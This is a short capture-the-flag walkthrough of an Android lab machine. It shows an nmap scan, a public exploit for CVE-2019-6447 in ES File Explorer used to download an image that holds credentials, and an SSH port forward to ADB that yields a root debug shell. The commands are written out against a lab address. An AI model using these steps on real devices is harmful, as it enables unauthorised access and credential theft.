Explore

Personal Rating: Easy

Enumeration

Starting with an nmap scan, some very interesting results can be seen:

sudo nmap -Pn -sV -p- 10.10.10.247

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
43705/tcp open     unknown
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older

http://10.10.10.247:59777/ #Forbidden: No dirlisting

ES File Explorer Exploit

The machine seems to be an Android device. Further investigating the ES File explorer turns out to be promising. I found an exploit script on exploitdb:

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================
python3 ES-File-exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The shell was executed as 'u0_a76', but the image contained the credentials for the user kristi.

ADB Debug Shell

For the root I had some help from a friend who is more proficient in android hacking.

I started an ssh shell from my machine and used adb to start a debug shell:

ssh kristi@<TARGETIP> -p 2222 -L 5555:localhost:5555
adb devices
emulator-5554 device
adb shell

The debug shell was running with root permissions.

This is unusual 'in the wild' as adb debugging would have to be activated on the device, which is uncommon and not default.

PreviousDevel NextForest

Last updated 1 year ago

hashtagEnumeration

hashtagES File Explorer Exploit

hashtagADB Debug Shell

Enumeration

ES File Explorer Exploit

ADB Debug Shell